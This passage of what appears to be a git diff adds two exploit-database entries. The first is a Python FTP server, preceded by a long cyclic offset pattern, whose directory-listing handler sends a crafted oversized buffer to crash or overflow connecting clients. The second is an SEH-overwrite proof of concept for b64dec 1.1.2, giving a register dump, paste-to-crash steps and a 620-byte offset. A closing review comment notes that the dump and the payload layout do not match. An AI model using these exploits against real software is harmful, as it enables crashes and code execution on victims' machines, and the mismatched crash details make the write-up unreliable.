c0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2
Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9Gl0Gl1Gl2Gl3Gl4Gl5Gl6Gl7Gl8Gl9Gm0Gm1Gm2Gm3Gm4Gm5Gm6Gm7Gm8Gm9Gn0Gn1Gn2Gn3Gn4Gn5Gn6Gn7Gn8Gn9Go0Go1Go2Go3Go4Go5Go6Go7Go8Go9Gp0Gp1Gp2Gp3Gp4Gp5Gp6Gp7Gp8Gp9Gq0Gq1Gq2Gq3Gq4Gq5Gq6Gq7Gq8Gq9Gr0Gr1Gr2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9Jg0Jg1Jg2Jg3Jg4Jg5Jg6Jg7Jg8Jg9Jh0Jh1Jh2Jh3Jh4Jh5Jh6Jh7Jh8Jh9Ji0Ji1Ji2Ji3Ji4Ji5Ji6Ji7Ji8Ji9Jj0Jj1Jj2Jj3Jj4Jj5Jj6Jj7Jj8Jj9Jk0Jk1Jk2Jk3Jk4Jk5Jk6Jk7Jk8Jk9Jl0Jl1Jl2Jl3Jl4Jl5Jl6Jl7Jl8Jl9Jm0Jm1Jm2Jm3Jm4Jm5Jm6Jm7Jm8Jm9Jn0Jn1Jn2Jn3Jn4Jn5Jn6Jn7Jn8Jn9Jo0Jo1Jo2Jo3Jo4Jo5Jo6Jo7Jo8Jo9Jp0Jp1Jp2Jp3Jp4Jp5Jp6Jp7Jp8Jp9Jq0Jq1Jq2Jq3Jq4Jq5Jq6Jq7Jq8Jq9Jr0Jr1Jr2Jr3Jr4Jr5Jr6Jr7Jr8Jr9Js0Js1Js2Js3Js4Js5Js6Js7Js8Js9Jt0Jt1Jt2Jt3Jt4Jt5Jt6Jt7Jt8Jt9Ju0Ju1Ju2Ju3Ju4Ju5Ju6Ju7Ju8Ju9Jv0Jv1Jv2Jv3Jv4Jv5Jv6Jv7Jv8Jv9Jw0Jw1Jw2Jw3Jw4Jw5Jw6Jw7Jw8Jw9Jx0Jx1Jx2Jx3Jx4Jx5Jx6Jx7Jx8Jx9Jy0Jy1Jy2Jy3Jy4Jy5Jy6Jy7Jy8Jy9Jz0Jz1Jz2Jz3Jz4Jz5Jz6Jz7Jz8Jz9Ka0Ka1Ka2Ka3Ka4Ka5Ka6Ka7Ka8Ka9Kb0Kb1Kb2Kb3Kb4Kb5Kb6Kb7Kb8Kb9Kc0Kc1Kc2Kc3Kc4Kc5Kc6Kc7Kc8Kc9Kd0Kd1Kd2Kd3Kd4Kd5Kd6Kd7Kd8Kd9Ke0Ke1Ke2Ke3Ke4Ke5Ke6Ke7Ke8Ke9Kf0Kf1Kf2Kf3Kf4Kf5Kf6Kf7Kf8Kf9Kg0Kg1Kg2Kg3Kg4Kg5K
g6Kg7Kg8Kg9Kh0Kh1Kh2Kh3Kh4Kh5Kh6Kh7Kh8Kh9Ki0Ki1Ki2Ki3Ki4Ki5Ki6Ki7Ki8Ki9Kj0Kj1Kj2Kj3Kj4Kj5Kj6Kj7Kj8Kj9Kk0Kk1Kk2Kk3Kk4Kk5Kk6Kk7Kk8Kk9Kl0Kl1Kl2Kl3Kl4Kl5Kl6Kl7Kl8Kl9Km0Km1Km2Km3Km4Km5Km6Km7Km8Km9Kn0Kn1Kn2Kn3Kn4Kn5Kn6Kn7Kn8Kn9Ko0Ko1Ko2Ko3Ko4Ko5Ko6Ko7Ko8Ko9Kp0Kp1Kp2Kp3Kp4Kp5Kp6Kp7Kp8Kp9Kq0Kq1Kq2Kq3Kq4Kq5Kq6Kq7Kq8Kq9Kr0Kr1Kr2Kr3Kr4Kr5Kr6Kr7Kr8Kr9Ks0Ks1Ks2Ks3Ks4Ks5Ks6Ks7Ks8Ks9Kt0Kt1Kt2Kt3Kt4Kt5Kt6Kt7Kt8Kt9Ku0Ku1Ku2Ku3Ku4Ku5Ku6Ku7Ku8Ku9Kv0Kv1Kv2Kv3Kv4Kv5Kv6Kv7Kv8Kv9Kw0Kw1Kw2Kw3Kw4Kw5Kw6Kw7Kw8Kw9Kx0Kx1Kx2Kx3Kx4Kx5Kx6Kx7Kx8Kx9Ky0Ky1Ky2Ky3Ky4Ky5Ky6Ky7Ky8Ky9Kz0Kz1Kz2Kz3Kz4Kz5Kz6Kz7Kz8Kz9La0La1La2La3La4La5La6La7La8La9Lb0Lb1Lb2Lb3Lb4Lb5Lb6Lb7Lb8Lb9Lc0Lc1Lc2Lc3Lc4Lc5Lc6Lc7Lc8Lc9Ld0Ld1Ld2Ld3Ld4Ld5Ld6Ld7Ld8Ld9Le0Le1Le2Le3Le4Le5Le6Le7Le8Le9Lf0Lf1Lf2Lf3Lf4Lf5Lf6Lf7Lf8Lf9Lg0Lg1Lg2Lg3Lg4Lg5Lg6Lg7Lg8Lg9Lh0Lh1Lh2Lh3Lh4Lh5Lh6Lh7Lh8Lh9Li0Li1Li2Li3Li4Li5Li6Li7Li8Li9Lj0Lj1Lj2Lj3Lj4Lj5Lj6Lj7Lj8Lj9Lk0Lk1Lk2Lk3Lk4Lk5Lk6Lk7Lk8Lk9Ll0Ll1Ll2Ll3Ll4Ll5Ll6Ll7Ll8Ll9Lm0Lm1Lm2Lm3Lm4Lm5Lm6Lm7Lm8Lm9Ln0Ln1Ln2Ln3Ln4Ln5Ln6Ln7Ln8Ln9Lo0Lo1Lo2Lo3Lo4Lo5Lo6Lo7Lo8Lo9Lp0Lp1Lp2Lp3Lp4Lp5Lp6Lp7Lp8Lp9Lq0Lq1Lq2Lq3Lq4Lq5Lq6Lq7Lq8Lq9Lr0Lr1Lr2Lr3Lr4Lr5Lr6Lr7Lr8Lr9Ls0Ls1Ls2Ls3Ls4Ls5Ls6Ls7Ls8Ls9Lt0Lt1Lt2Lt3Lt4Lt5Lt6Lt7Lt8Lt9Lu0Lu1Lu2Lu3Lu4Lu5Lu6Lu7Lu8Lu9Lv0Lv1Lv2Lv3Lv4Lv5Lv6Lv7Lv8Lv9Lw0Lw1Lw2Lw3Lw4Lw5Lw6Lw7Lw8Lw9Lx0Lx1Lx2Lx3Lx4Lx5Lx6Lx7Lx8Lx9Ly0Ly1Ly2Ly3Ly4Ly5Ly6Ly7Ly8Ly9Lz0Lz1Lz2Lz3Lz4Lz5Lz6Lz7Lz8Lz9Ma0Ma1Ma2Ma3Ma4Ma5Ma6Ma7Ma8Ma9Mb0Mb1Mb2Mb3Mb4Mb5Mb6Mb7Mb8Mb9Mc0Mc1Mc2Mc3Mc4Mc5Mc6Mc7Mc8Mc9Md0Md1Md2Md3Md4Md5Md6Md7Md8Md9Me0Me1Me2Me3Me4Me5Me6Me7Me8Me9Mf0Mf1Mf2Mf3Mf4Mf5Mf6Mf7Mf8Mf9Mg0Mg1Mg2Mg3Mg4Mg5Mg6Mg7Mg8Mg9Mh0Mh1Mh2Mh3Mh4Mh5Mh6Mh7Mh8Mh9Mi0Mi1Mi2Mi3Mi4Mi5Mi6Mi7Mi8Mi9Mj0Mj1Mj2Mj3Mj4Mj5Mj6Mj7Mj8Mj9Mk0Mk1Mk2Mk3Mk4Mk5Mk6Mk7Mk8Mk9Ml0Ml1Ml2Ml3Ml4Ml5Ml6Ml7Ml8Ml9Mm0Mm1Mm2Mm3Mm4Mm5Mm6Mm7Mm8Mm9Mn0Mn1Mn2Mn3Mn4Mn5Mn6Mn7Mn8Mn9Mo0Mo1Mo2Mo3Mo4Mo5Mo6Mo7Mo8Mo9Mp0Mp1Mp2Mp3Mp4Mp5Mp6Mp7Mp8Mp9Mq0Mq1Mq2Mq3Mq4Mq5Mq6Mq7Mq8Mq9Mr0Mr1Mr2Mr3Mr4Mr5Mr6Mr7Mr8Mr9Ms0Ms1Ms2Ms3Ms4Ms5Ms6Ms7Ms8Ms9Mt0Mt1Mt2Mt3Mt4Mt5Mt6Mt7Mt8Mt9Mu0Mu1Mu2Mu3Mu4Mu5Mu6Mu7Mu8Mu9Mv0Mv1Mv2
M" + + +class FTPserverThread(threading.Thread): + def __init__(self,(conn,addr)): + self.conn=conn + self.addr=addr + self.basewd=currdir + self.cwd=self.basewd + self.rest=False + self.pasv_mode=False + threading.Thread.__init__(self) + + def run(self): + self.conn.send('220 Welcome!\r\n') + while True: + cmd=self.conn.recv(256) + if not cmd: break + else: + print 'Recieved:',cmd + try: + func=getattr(self,cmd[:4].strip().upper()) + func(cmd) + except Exception,e: + print 'ERROR:',e + #traceback.print_exc() + self.conn.send('500 Sorry.\r\n') + + def SYST(self,cmd): + self.conn.send('215 UNIX Type: L8\r\n') + def OPTS(self,cmd): + if cmd[5:-2].upper()=='UTF8 ON': + self.conn.send('200 OK.\r\n') + else: + self.conn.send('451 Sorry.\r\n') + def USER(self,cmd): + self.conn.send('331 OK.\r\n') + def PASS(self,cmd): + self.conn.send('230 OK.\r\n') + #self.conn.send('530 Incorrect.\r\n') + def QUIT(self,cmd): + self.conn.send('221 Goodbye.\r\n') + def NOOP(self,cmd): + self.conn.send('200 OK.\r\n') + def TYPE(self,cmd): + self.mode=cmd[5] + self.conn.send('200 Binary mode.\r\n') + + def CDUP(self,cmd): + if not os.path.samefile(self.cwd,self.basewd): + #learn from stackoverflow + self.cwd=os.path.abspath(os.path.join(self.cwd,'..')) + self.conn.send('200 OK.\r\n') + def PWD(self,cmd): + cwd=os.path.relpath(self.cwd,self.basewd) + if cwd=='.': + cwd='/' + else: + cwd='/'+cwd + self.conn.send('257 \"%s\"\r\n' % cwd) + def CWD(self,cmd): + chwd=cmd[4:-2] + if chwd=='/': + self.cwd=self.basewd + elif chwd[0]=='/': + self.cwd=os.path.join(self.basewd,chwd[1:]) + else: + self.cwd=os.path.join(self.cwd,chwd) + self.conn.send('250 OK.\r\n') + + def PORT(self,cmd): + if self.pasv_mode: + self.servsock.close() + self.pasv_mode = False + l=cmd[5:].split(',') + self.dataAddr='.'.join(l[:4]) + self.dataPort=(int(l[4])<<8)+int(l[5]) + self.conn.send('200 Get port.\r\n') + + def PASV(self,cmd): # from http://goo.gl/3if2U + self.pasv_mode = True + self.servsock = 
socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+ self.servsock.bind((local_ip,0))
+ self.servsock.listen(1)
+ ip, port = self.servsock.getsockname()
+ print 'open', ip, port
+ self.conn.send('227 Entering Passive Mode (%s,%u,%u).\r\n' %
+ (','.join(ip.split('.')), port>>8&0xFF, port&0xFF))
+
+ def start_datasock(self):
+ if self.pasv_mode:
+ self.datasock, addr = self.servsock.accept()
+ print 'connect:', addr
+ else:
+ self.datasock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+ self.datasock.connect((self.dataAddr,self.dataPort))
+
+ def stop_datasock(self):
+ self.datasock.close()
+ if self.pasv_mode:
+ self.servsock.close()
+
+
+ def LIST(self,cmd):
+ self.conn.send('150 Here comes the directory listing.\r\n')
+ self.start_datasock()
+ for t in os.listdir(self.cwd):
+ k=self.toListItem(os.path.join(self.cwd,t))
+ self.datasock.send(buff + buff + buff + '\r\n')
+ print "[+] Crafted packet sent . . . [+]"
+ #self.datasock.send(buff + buff + '\r\n')
+ self.stop_datasock()
+ self.conn.send('226 Directory send OK.\r\n')
+
+ def toListItem(self,fn):
+ st=os.stat(fn)
+ fullmode='rwxrwxrwx'
+ mode=''
+ for i in range(9):
+ mode+=((st.st_mode>>(8-i))&1) and fullmode[i] or '-'
+ d=(os.path.isdir(fn)) and 'd' or '-'
+ ftime=time.strftime(' %b %d %H:%M ', time.gmtime(st.st_mtime))
+ return d+mode+' 1 user group '+str(st.st_size)+ftime+os.path.basename(fn)
+
+ def MKD(self,cmd):
+ dn=os.path.join(self.cwd,cmd[4:-2])
+ os.mkdir(dn)
+ self.conn.send('257 Directory created.\r\n')
+
+ def RMD(self,cmd):
+ dn=os.path.join(self.cwd,cmd[4:-2])
+ if allow_delete:
+ os.rmdir(dn)
+ self.conn.send('250 Directory deleted.\r\n')
+ else:
+ self.conn.send('450 Not allowed.\r\n')
+
+ def DELE(self,cmd):
+ fn=os.path.join(self.cwd,cmd[5:-2])
+ if allow_delete:
+ os.remove(fn)
+ self.conn.send('250 File deleted.\r\n')
+ else:
+ self.conn.send('450 Not allowed.\r\n')
+
+ def RNFR(self,cmd):
+ self.rnfn=os.path.join(self.cwd,cmd[5:-2])
+ self.conn.send('350 Ready.\r\n')
+
+ def 
RNTO(self,cmd):
+ fn=os.path.join(self.cwd,cmd[5:-2])
+ os.rename(self.rnfn,fn)
+ self.conn.send('250 File renamed.\r\n')
+
+ def REST(self,cmd):
+ self.pos=int(cmd[5:-2])
+ self.rest=True
+ self.conn.send('250 File position reseted.\r\n')
+
+ def RETR(self,cmd):
+ fn=os.path.join(self.cwd,cmd[5:-2])
+ #fn=os.path.join(self.cwd,cmd[5:-2]).lstrip('/')
+ print 'Downlowding:',fn
+ if self.mode=='I':
+ fi=open(fn,'rb')
+ else:
+ fi=open(fn,'r')
+ self.conn.send('150 Opening data connection.\r\n')
+ if self.rest:
+ fi.seek(self.pos)
+ self.rest=False
+ data= fi.read(1024)
+ self.start_datasock()
+ while data:
+ self.datasock.send(data)
+ data=fi.read(1024)
+ fi.close()
+ self.stop_datasock()
+ self.conn.send('226 Transfer complete.\r\n')
+
+ def STOR(self,cmd):
+ fn=os.path.join(self.cwd,cmd[5:-2])
+ print 'Uplaoding:',fn
+ if self.mode=='I':
+ fo=open(fn,'wb')
+ else:
+ fo=open(fn,'w')
+ self.conn.send('150 Opening data connection.\r\n')
+ self.start_datasock()
+ while True:
+ data=self.datasock.recv(1024)
+ if not data: break
+ fo.write(data)
+ fo.close()
+ self.stop_datasock()
+ self.conn.send('226 Transfer complete.\r\n')
+
+class FTPserver(threading.Thread):
+ def __init__(self):
+ self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ self.sock.bind((local_ip,local_port))
+ threading.Thread.__init__(self)
+
+ def run(self):
+ self.sock.listen(5)
+ while True:
+ th=FTPserverThread(self.sock.accept())
+ th.daemon=True
+ th.start()
+
+ def stop(self):
+ self.sock.close()
+
+if __name__=='__main__':
+ ftp=FTPserver()
+ ftp.daemon=True
+ ftp.start()
+ print 'On', local_ip, ':', local_port
+ raw_input('Enter to end...\n')
+ ftp.stop()
\ No newline at end of file
diff --git a/platforms/windows/dos/39070.txt b/platforms/windows/dos/39070.txt
new file mode 100755
index 000000000..98180ea47
--- /dev/null
+++ b/platforms/windows/dos/39070.txt
@@ -0,0 +1,52 @@
+********************************************************************************************
+# Exploit: b64dec SEH OverWrite.
+# Date: 12/18/2015
+# Exploit Author: Un_N0n
+# Vendor: Tim Rohlfs
+# Software Link: http://4mhz.de/b64dec.html
+# Version: 1.1.2
+# Tested on: Windows 7 x64(64bit)
+********************************************************************************************
+
+[Dump]
+
+SEH chain of thread 00000EC0
+Address SE handler
+024CFC50 b64dec.00458140
+024CFC5C b64dec.004581B3
+024CFF28 b64dec.0045847C
+024CFF00 41414141 <-------
+41414141 *** CORRUPT ENTRY *** <-------
+----------------------------------------------------
+024CFEE4 41414141 AAAA
+024CFEE8 41414141 AAAA
+024CFEEC 41414141 AAAA
+024CFEF0 41414141 AAAA
+024CFEF4 41414141 AAAA
+024CFEF8 41414141 AAAA
+024CFEFC 41414141 AAAA
+024CFF00 41414141 AAAA Pointer to next SEH record <-----
+024CFF04 41414141 AAAA SE handler <-----
+024CFF08 41414141 AAAA
+024CFF0C 41414141 AAAA
+024CFF10 41414141 AAAA
+024CFF14 41414141 AAAA
+024CFF18 41414141 AAAA
+
+
+[How to?]
+1 - Open up b64dec.exe
+2 - In Search field, paste in the contents of Crash.txt
+3 - Hit 'Decode'
+
+~ Software Crashes due to SEH Over-Write.
+
+[Crash.txt?]
+AAAAAAAAAAAAAAAAAAAAAAAAAA.......620 BBBB CCCC DDDDDDDDDDDDDDDDDDD
+
+--------------------------------------|-----|
+ NSEH SEH
+
+[Extra Info]
+Offset = 620
+********************************************************************************************
\ No newline at end of file
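Review bot: The `[Dump]` section and the `[Crash.txt?]` layout do not describe the same input. The layout puts `BBBB` and `CCCC` in the NSEH/SEH slots after 620 bytes of filler, yet the dump shows `41414141` in both "Pointer to next SEH record" (024CFF00) and "SE handler" (024CFF04), so the dump was presumably captured with an all-`A` buffer. Someone re-running this to confirm a fix cannot tell which crash state to expect; a line such as `Dump captured with an all-'A' input; layout below shown for offset reference only` under `[Dump]` would remove the ambiguity, if that is indeed how it was taken. The header also records no fixed version or vendor response for 1.1.2, which is worth stating even when the answer is "none at time of writing".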